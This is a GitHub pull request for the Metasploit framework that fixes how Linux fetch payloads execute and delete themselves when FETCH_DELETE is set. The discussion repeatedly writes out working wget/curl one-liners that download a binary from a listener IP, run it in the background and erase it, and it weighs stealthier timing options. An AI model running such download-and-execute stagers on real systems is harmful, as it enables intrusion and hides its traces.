Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Fix bug in the way we are executing fetch payload when FETCH_DELETE is true #19719

Merged
merged 3 commits into from
Dec 17, 2024

Conversation

bwatters-r7
Copy link
Contributor

@bwatters-r7 bwatters-r7 commented Dec 12, 2024

This change fixes a bug in the way we execute the payload elf inside fetch command payloads when the FETCH_DELETE value is set to true. @h00die-gr3y did a great job explaining everything in the issue, and then solving it.
Fixes #19391

Old and Busted

msfuser@ubuntu2004-vm:~$ wget -qO /tmp/uDhlPVBiInV http://10.5.135.201:8080/RByzlSnTzclKDpvXskXIrg; chmod +x /tmp/uDhlPVBiInV; /tmp/uDhlPVBiInV &;rm -rf /tmp/uDhlPVBiInV
-bash: syntax error near unexpected token `;'

New and Improved

msfuser@ubuntu2004-vm:~$ wget -qO /tmp/uDhlPVBiInV http://10.5.135.201:8080/RByzlSnTzclKDpvXskXIrg; chmod +x /tmp/uDhlPVBiInV; (/tmp/uDhlPVBiInV &);rm -rf /tmp/uDhlPVBiInV

Verification:

  • Generate a Linux fetch payload with FETCH_DELETE set to true.
  • Verify the payload elf is executed within a parenthetical i.e. (...)
  • Verify you get the callback

Thanks, @h00die-gr3y!

@msutovsky-r7
Copy link
Contributor

The issue itself seems to be fixed. The payload from bash syntax perspective is okay and it's running. However, from functional perspective, the payload seems to be causing some sort of race condition. Example:

curl -so /tmp/sLFETHiJPNOe http://192.168.95.128:8081/QWsFZF6RRwO7HKlYvH4TQA; chmod +x /tmp/sLFETHiJPNOe; (/tmp/sLFETHiJPNOe &);rm -rf /tmp/sLFETHiJPNOe

When the payload spawns a new process, the deletion of the payload is sometimes faster than new process. Which results in failure. I suspect race condition as the payload sometimes runs successfully.

@bwatters-r7
Copy link
Contributor Author

I have not seen this, but I can believe it. I was concerned about that when we executed as background. I wonder if there's a very short sleep or time-consuming command we could run.

@msutovsky-r7
Copy link
Contributor

msutovsky-r7 commented Dec 13, 2024

Already tested that, we can do following:

curl -so /tmp/sLFETHiJPNOe http://192.168.95.128:8081/QWsFZF6RRwO7HKlYvH4TQA; chmod +x /tmp/sLFETHiJPNOe; (/tmp/sLFETHiJPNOe &); sleep 1; rm -rf /tmp/sLFETHiJPNOe

It should fix the problem, I tried it with meterpreter and it worked.

@bwatters-r7
Copy link
Contributor Author

Already tested that, we can do following:

curl -so /tmp/sLFETHiJPNOe http://192.168.95.128:8081/QWsFZF6RRwO7HKlYvH4TQA; chmod +x /tmp/sLFETHiJPNOe; (/tmp/sLFETHiJPNOe &); sleep 1; rm -rf /tmp/sLFETHiJPNOe

It should fix the problem, I tried it with meterpreter and it worked.

In my mind I was thinking about something sneakier and shorter, but I'm not coming up with anything. Probably sleep is the best option. ping and timeout` are longer and use network; other options are not POSIX. What we're doing is not exactly subtle, so being sneaky about the pause is not going to affect the overall stealthyness....

@msutovsky-r7
Copy link
Contributor

This also an option, I'm not sure if it's sneaky, but at least it's not a sleep:

 curl -so /tmp/sLFETHiJPNOe http://192.168.95.128:8081/QWsFZF6RRwO7HKlYvH4TQA; chmod +x /tmp/sLFETHiJPNOe; /tmp/sLFETHiJPNOe & pid=$!; wait $pid;rm -rf /tmp/sLFETHiJPNOe

Basically, just get pid of that spawned process, then wait for change of the process status - which means that the process is running and loaded and then delete it.

@bwatters-r7
Copy link
Contributor Author

Using wait, the payload does not delete until the process stops and also blocks the launcher?
wget -qO /tmp/kJZLxQuOpDE http://10.5.135.201:8080/RByzlSnTzclKDpvXskXIrg;chmod +x /tmp/kJZLxQuOpDE;/tmp/kJZLxQuOpDE & pid=$!; wait $pid; rm -rf /tmp/kJZLxQuOpDE

image

image

Copy link
Contributor

@msutovsky-r7 msutovsky-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Code is fine, used sleep with random number from range 3 and 7 rather than wait

@msutovsky-r7 msutovsky-r7 merged commit 4a13b09 into rapid7:master Dec 17, 2024
69 checks passed
@msutovsky-r7
Copy link
Contributor

msutovsky-r7 commented Dec 17, 2024

Release Notes

The bug in fetch payload resulted in malformed bash command when setting FETCH_DELETE to true, causing syntax error. While we fixed the original error, when we were testing the fix, we noticed a race condition - causing deleting the payload file before executing it. In the final fix, we added random sleep between executing and deleting to prevent race condition and to keep bash syntax integrity.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
easy rn-fix release notes fix
Projects
Archived in project
Development

Successfully merging this pull request may close these issues.

Reports of Fetch payloads failing when FETCH_DELETE is set to TRUE
2 participants